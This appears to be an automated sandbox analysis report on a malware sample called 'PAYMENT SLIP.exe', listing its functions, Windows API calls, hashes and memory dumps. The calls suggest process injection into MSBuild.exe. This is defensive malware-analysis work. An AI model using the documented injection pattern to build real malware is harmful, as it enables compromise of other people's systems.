              • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
              • Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
              • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
              • Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F97, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405F97(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









              0x00405fa7
              0x00405fa9
              0x00405fac
              0x00405fd8
              0x00405fb1
              0x00405fba
              0x00405fbf
              0x00405fca
              0x00405fcd
              0x00405fe9
              0x00405fcf
              0x00405fd6
              0x00000000
              0x00405fd6
              0x00405fe2
              0x00405fe6
              0x00405fe6
              0x00405fe0
              0x00000000

              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBF
              • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
              • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
              • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9
              Uniqueness

              Uniqueness Score: -1.00%

              Analysis Process: PAYMENT SLIP.exe PID: 5704 Parent PID: 7116 PAYMENT SLIP.exeCOMMON

              Executed Functions

              Function 023A1450, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 461memoryfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 023A126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 023A128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 023A18E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023A1960
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 087bb012aaca77d47755108d276033efb4177b7a6996b0f73ce5bfba1f9e3653
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: E9026C25E54398E9EB61CBE4EC16BEDB7B5AF04B10F10449AE60CFA1D1D3B10A84DF16
              Uniqueness

              Uniqueness Score: -1.00%

              Function 023A0950, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 023A0A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 023A0C1F
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: f3d2c6525d4fa50dc4f244531ca151cd9d4824e62e48c6076a07589df7fa40ad
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: 2DA1EF30E11209EFDF14DFE4C995BADBBB1EF08315F20846AE911BA2A0D3759A51DF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 023A1A70, Relevance: 9.1, APIs: 6, Instructions: 118fileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 023A1BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 023A1BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 023A1B25
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction ID: f41b2adcd939090a22c15f200a5d9c48461f1e43c7671c6cfb6657c3f1a5feb8
              • Opcode Fuzzy Hash: 13c43d67a1bd41c791ffee7eecdbab20b06a7b62dbc9f074a5a54340b611209a
              • Instruction Fuzzy Hash: FF410230D51209FEEF21AFA4CC15FAEBAB6EF04312F1045B4EA55B91A0E7714A11EF10
              Uniqueness

              Uniqueness Score: -1.00%

              Function 023A0034, Relevance: 6.7, APIs: 4, Instructions: 727processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 023A05BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 023A05E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 023A0605
              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 023A091F
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadTerminateThread
              • String ID:
              • API String ID: 3842210937-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: 2e64375eeb85010495cf810d5eb959b69fdc572989f38ecec494a473ad45b332
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 87520B35E50258AEEB64CBA4EC65BFDB7B5FF48710F10449AE608EA2A0D3715E80DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 023A1BDE, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 023A1BFF
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction ID: 1cee014986bf3723a90fb986fdd1c0731d7683ce6c687f28dda338011720ee4c
              • Opcode Fuzzy Hash: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction Fuzzy Hash: 96F03075C0020CFFDF14EFA4C8186ADBB70EB00315F1046B5E86467290D7314AA1DF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 023A126A, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 023A128F
              Memory Dump Source
              • Source File: 0000000A.00000002.723775404.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: c9da6ca98c486262c14bb2bfc809566c62788ae307f2f5cdfc6c7504ec1cf4a2
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: 0DD05EB1C5030CBFCB14EFE0CC46C5EBF7DDB01301F1081AAAC0067100DA759B109A94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Analysis Process: MSBuild.exe PID: 6372 Parent PID: 6024 MSBuild.exeCOMMON

              Executed Functions

              Function 056A3850, Relevance: 2.0, Strings: 1, Instructions: 756COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: >_uq
              • API String ID: 0-588969242
              • Opcode ID: c1241226495842b78570bffd1241834c8c302d22774753f47b125ad23f6d5aa3
              • Instruction ID: ff9d82a6d2d8ef8a38563c45138d7a88a8f6cfb194eef34af29ad81fe3e345ea
              • Opcode Fuzzy Hash: c1241226495842b78570bffd1241834c8c302d22774753f47b125ad23f6d5aa3
              • Instruction Fuzzy Hash: EE52B172B04216CFCB14CF58C8849AABBB2FF45310B1589AAD9199F316D771EC46CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D27E8, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
              Download Yara Rule
              APIs
              • bind.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D289B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: bind
              • String ID:
              • API String ID: 1187836755-0
              • Opcode ID: 9b043665f843de9eb16701f3a2ffc43cf8db6213402563699e835387e6d3dc4e
              • Instruction ID: 1058ee67366ad67c5a320a85cd662f0edc56954d5b26f7514fdab78d53d356b2
              • Opcode Fuzzy Hash: 9b043665f843de9eb16701f3a2ffc43cf8db6213402563699e835387e6d3dc4e
              • Instruction Fuzzy Hash: B7316DB150D3C06FD7138B258C54B96BFB8AF07220F0984EBE984DF1A3D2649849C772
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D12B3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
              Download Yara Rule
              APIs
              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 057D1333
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: AdjustPrivilegesToken
              • String ID:
              • API String ID: 2874748243-0
              • Opcode ID: 1695e5f3480e53e27ca6d3b2a47afc4337cf6500a2dd15d340342d0bd6aa62da
              • Instruction ID: 94be48f1f4bcccf6b256fa134ef2b00077a6a389b4525ba741369364b4976e78
              • Opcode Fuzzy Hash: 1695e5f3480e53e27ca6d3b2a47afc4337cf6500a2dd15d340342d0bd6aa62da
              • Instruction Fuzzy Hash: 9B21BF76509384AFDB228F25DC40B52BFB4EF06210F0984AAED858F563D270A808DB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D2CF6, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
              Download Yara Rule
              APIs
              • WSARecv.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D2D66
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: Recv
              • String ID:
              • API String ID: 4192927123-0
              • Opcode ID: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction ID: 3f320696647cbb460131a1edcaff5297c9e0997b5b2ab6f348bf702a3df68ec0
              • Opcode Fuzzy Hash: 906528eb327bde502bfd0f3923e7a050f3b959bb4b969687f0545244b6411f74
              • Instruction Fuzzy Hash: A011A272500304AFEB22CF55DD44FA6FBA8EF04320F04886AE9459B656D634E405CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D14EF, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
              Download Yara Rule
              APIs
              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 057D1565
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InformationQuerySystem
              • String ID:
              • API String ID: 3562636166-0
              • Opcode ID: f5bfc5389e16474268e4d69a3be834b01b55100c0e0d7dba4ee391da573d4b3d
              • Instruction ID: 7c4c4483b4ef4dbfdc71a8bf6dad822ab9abf1b6f716c96b1b1ccbe5fba5a2e2
              • Opcode Fuzzy Hash: f5bfc5389e16474268e4d69a3be834b01b55100c0e0d7dba4ee391da573d4b3d
              • Instruction Fuzzy Hash: 2321A1714097C09FDB238B21DC41A51FFB4EF16314F0980DBE9854B563D2659509DB72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D283A, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
              Download Yara Rule
              APIs
              • bind.WS2_32(?,00000E2C,B4FCE2B2,00000000,00000000,00000000,00000000), ref: 057D289B
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: bind
              • String ID:
              • API String ID: 1187836755-0
              • Opcode ID: ae9228e1cb6529a7fcafabdfaa095db5c11326f18a1384fbf2fcc4b6e5816108
              • Instruction ID: d30edfa014c5e0b751e90660d036b7833f13ef0c891af5669de21f1381eff5b9
              • Opcode Fuzzy Hash: ae9228e1cb6529a7fcafabdfaa095db5c11326f18a1384fbf2fcc4b6e5816108
              • Instruction Fuzzy Hash: 8111C1B6500304AFE721CF55DC84FA6FBACEF04320F18846AED499B646D674E449CBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D12EA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 057D1333
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: AdjustPrivilegesToken
              • String ID:
              • API String ID: 2874748243-0
              • Opcode ID: 7f3068d041241cff6f729971c9460744776bb3d81d0b562ed83989b495f1ed5c
              • Instruction ID: 6519649c81fe4434557cc26cc6c0418f86320598eb2da3f9c2945622f9d0a1fb
              • Opcode Fuzzy Hash: 7f3068d041241cff6f729971c9460744776bb3d81d0b562ed83989b495f1ed5c
              • Instruction Fuzzy Hash: D3115A76A003049FDB20CF59D884B66FBE5EF04320F0884AAED868BA56D375E458DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D1012, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
              Download Yara Rule
              APIs
              • GetSystemInfo.KERNELBASE(?), ref: 057D1044
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InfoSystem
              • String ID:
              • API String ID: 31276548-0
              • Opcode ID: ea8c22caddb3621a1391854253e8651bf26bafaa400e9da185d9e1664dcb302a
              • Instruction ID: 2b9f1b8d6430a31b3bbc172d46bc18c53dd9d2296fcb775c8eb7befd4dce925c
              • Opcode Fuzzy Hash: ea8c22caddb3621a1391854253e8651bf26bafaa400e9da185d9e1664dcb302a
              • Instruction Fuzzy Hash: 7C01AD71904384DFDB20DF5AD884766FBA4EF04320F48C4AADD898F646D279A404CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D152A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
              Download Yara Rule
              APIs
              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 057D1565
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: InformationQuerySystem
              • String ID:
              • API String ID: 3562636166-0
              • Opcode ID: ca0d6ef4c9688af2af0bd745b81ff47ec73047718e96c7f30f0b754038d15d07
              • Instruction ID: ffb462b04e5db83a63badf55bf6089986d245945caf7225ff0c08c3e73cddaf4
              • Opcode Fuzzy Hash: ca0d6ef4c9688af2af0bd745b81ff47ec73047718e96c7f30f0b754038d15d07
              • Instruction Fuzzy Hash: 810178359007409FDB208F4AD884B61FBA1EF08320F08C49ADD8A0BA56D279A418DFB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AAF78, Relevance: .9, Instructions: 905COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 56f1315380d95b41459a0c1dc546b5e119094c2775560e33175aafc4e39d252a
              • Instruction ID: bdb31b4ca69491ba918178af31c4817235daf9cad7d1ac58f5dc6a1fe1eb9bf9
              • Opcode Fuzzy Hash: 56f1315380d95b41459a0c1dc546b5e119094c2775560e33175aafc4e39d252a
              • Instruction Fuzzy Hash: B5821475A006059FCB14CF69C484AAEFBB2FF88310F158669D85AAB765D730ED81CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A23A0, Relevance: .5, Instructions: 505COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ca7bf2c1a84be93db7ff8a8801312bdba0319d027126faebe871537b7073cedd
              • Instruction ID: ce0851c38420f8fad7962e10eab1b0b90747794de9a2142efd1b269a184f6ac2
              • Opcode Fuzzy Hash: ca7bf2c1a84be93db7ff8a8801312bdba0319d027126faebe871537b7073cedd
              • Instruction Fuzzy Hash: 3B12783AA04225CFDB24CF39C4A46ADBBF3FB89304F14816AD4169B259DB749C86CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A86A8, Relevance: .5, Instructions: 505COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 458394130ac318db0ef480e024e4806a793bf20eab616865da11a85f092f0e3c
              • Instruction ID: e90cdbd9fce23e698b2aca3ba07a018023c728b1cae7d9da269a2102b268a921
              • Opcode Fuzzy Hash: 458394130ac318db0ef480e024e4806a793bf20eab616865da11a85f092f0e3c
              • Instruction Fuzzy Hash: D8129C32E14215CFEB28DF69C48866DBBF2BF89300F258569E416AB651DB78DC42CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A2FA8, Relevance: .2, Instructions: 239COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cf5e50043f1203de4978fb7c38f5611e0b96a24453cc5b3b92e03b7d8156d15
              • Instruction ID: abdf0802ba6ed3ef10cbd65239628f86fd4e51070afd33352ba4b81521de6f71
              • Opcode Fuzzy Hash: 3cf5e50043f1203de4978fb7c38f5611e0b96a24453cc5b3b92e03b7d8156d15
              • Instruction Fuzzy Hash: BB819E32F011159BDB14DB69C994A6EB7E3AFC8710F2A8569E405EB365DE34DC01CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A92A8, Relevance: .2, Instructions: 239COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 152f6f7be538b0ee849e6834af19297e0b358a070992a5b8d718b3afaf917218
              • Instruction ID: 362cacc379ae5561cb16f4fd29e08965b96f30881853a87ad3fbbb8e4e185982
              • Opcode Fuzzy Hash: 152f6f7be538b0ee849e6834af19297e0b358a070992a5b8d718b3afaf917218
              • Instruction Fuzzy Hash: DD817D72F011159BD714DB69C890A6EB7F3AFC4710F2A8165E805EB3A5DE35DC02CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D01F4, Relevance: 3.1, APIs: 2, Instructions: 97synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateMutexW.KERNELBASE(?,?), ref: 057D019D
              • FindCloseChangeNotification.KERNELBASE(?), ref: 057D0264
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: ChangeCloseCreateFindMutexNotification
              • String ID:
              • API String ID: 2967213129-0
              • Opcode ID: 18e75fe9ddd1e36507fc25d19b6983223a6d31d0fae1fec5fe66ea376b7e8e68
              • Instruction ID: 348d2de8e13cf7862690a3ea491fdabd9021ff777fba4fd6330bef0d8e8faf6e
              • Opcode Fuzzy Hash: 18e75fe9ddd1e36507fc25d19b6983223a6d31d0fae1fec5fe66ea376b7e8e68
              • Instruction Fuzzy Hash: 0231C5719053809FD711CF15ED49BA6FFA4EF02320F0884ABDC848F652E235A904CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A2D58, Relevance: 2.6, Strings: 2, Instructions: 135COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              • Opcode ID: d244619a5aa0d51b55e9171a70cbb82c84dcf487dd873ba4357255c24f2e0cdd
              • Instruction ID: 80e59b38e0c1114adb9e29ee2b445123db1fbb844524d9f865c3b3e7dc75eedb
              • Opcode Fuzzy Hash: d244619a5aa0d51b55e9171a70cbb82c84dcf487dd873ba4357255c24f2e0cdd
              • Instruction Fuzzy Hash: B141B13AF842558FCB10DF69C8505BEB7B3BBC0215B25846AC415DBA06C635DC83CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A9058, Relevance: 2.6, Strings: 2, Instructions: 130COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              • Opcode ID: 0892757ae6c0fb2b09a1ffbfcb5ac350485df76d4b725848d102389762185159
              • Instruction ID: 74089900ae8eee11f2293e96006454f73b5c6d81b262592b133214e5bcca3afa
              • Opcode Fuzzy Hash: 0892757ae6c0fb2b09a1ffbfcb5ac350485df76d4b725848d102389762185159
              • Instruction Fuzzy Hash: 2641AF36F041058BDB10DB69CC889AEBBB3ABC1354B35886AD4159BA05C632DD43CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0D08, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 057D0DAB
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 9dd230546426323cf3b43f6f1afd8d37138c6a9613ffaa80e8bc8307486343e0
              • Instruction ID: 5cf5c53872d258edcf0b721141c297f15f8acd7d226349a90bd0bea0c634bd2d
              • Opcode Fuzzy Hash: 9dd230546426323cf3b43f6f1afd8d37138c6a9613ffaa80e8bc8307486343e0
              • Instruction Fuzzy Hash: 5F3195715043446FEB228F65DC44F67BFACEF05320F0488AAE985DB152D264E515CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0A9B, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
              Download Yara Rule
              APIs
              • GetTempFileNameW.KERNELBASE(?,00000E2C,?,?), ref: 057D0B6A
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: FileNameTemp
              • String ID:
              • API String ID: 745986568-0
              • Opcode ID: 0e966b279fb5a3b9b2501b52a2a0d41834b20373caaf1fc0e898a9f0afb5c6e4
              • Instruction ID: 8cf77886b5b6094307588d5d408c330f17375d38079f7e4c6a3df86e61bd1a03
              • Opcode Fuzzy Hash: 0e966b279fb5a3b9b2501b52a2a0d41834b20373caaf1fc0e898a9f0afb5c6e4
              • Instruction Fuzzy Hash: BF315A6140E3C06FD7139B258C61B62BFB4EF47624F0A81DBD8849F5A3D6246919C7B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON
              Download Yara Rule
              APIs
              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 057D045E
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              • Opcode ID: d104873faecbb6440a887d5a9202a6798047e76442ab7018ba1f0e7bc56e38f9
              • Instruction ID: aeef2675533f8c478248053311b4bdec22036c988935cae37459ac9f78d19d78
              • Opcode Fuzzy Hash: d104873faecbb6440a887d5a9202a6798047e76442ab7018ba1f0e7bc56e38f9
              • Instruction Fuzzy Hash: 8631D5B2004344AFE7228F11CC45FA6FFB8EF06314F04899EE9858B192D3B5A949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D07F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 057D0899
              Memory Dump Source
              • Source File: 0000000C.00000002.912531204.00000000057D0000.00000040.00000001.sdmp, Offset: 057D0000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 63ec8bd641568f72a8de4838ac2620eb2b393c43cf306c56dfec7f2caa02e616
              • Instruction ID: ce55ad4c725b1a3458645f1966792867fda4af8d96df0a47c6f0c00e6208b645
              • Opcode Fuzzy Hash: 63ec8bd641568f72a8de4838ac2620eb2b393c43cf306c56dfec7f2caa02e616
              • Instruction Fuzzy Hash: F4316AB1505380AFE722CB25DC44F66FFE8EF05210F0884AAE9858B252D265E809DB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BAA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 014BAAB1
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              • Opcode ID: 130fc48deea2c00c4386c08709f428202d5a58707b1a587a9de362615f6a266c
              • Instruction ID: 07401c090e3364ce40a567663f8059b0e283c207a41d6332d9919f4fa78c7c5a
              • Opcode Fuzzy Hash: 130fc48deea2c00c4386c08709f428202d5a58707b1a587a9de362615f6a266c
              • Instruction Fuzzy Hash: E931A2B25443846FE7228B25CC85FA7BFACEF05310F0884AAED819B152D264E949CB71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 057D0E09, Relevance: 1.6, APIs: 1, Instructions: 91COMMON
              Download Yara Rule
              APIs
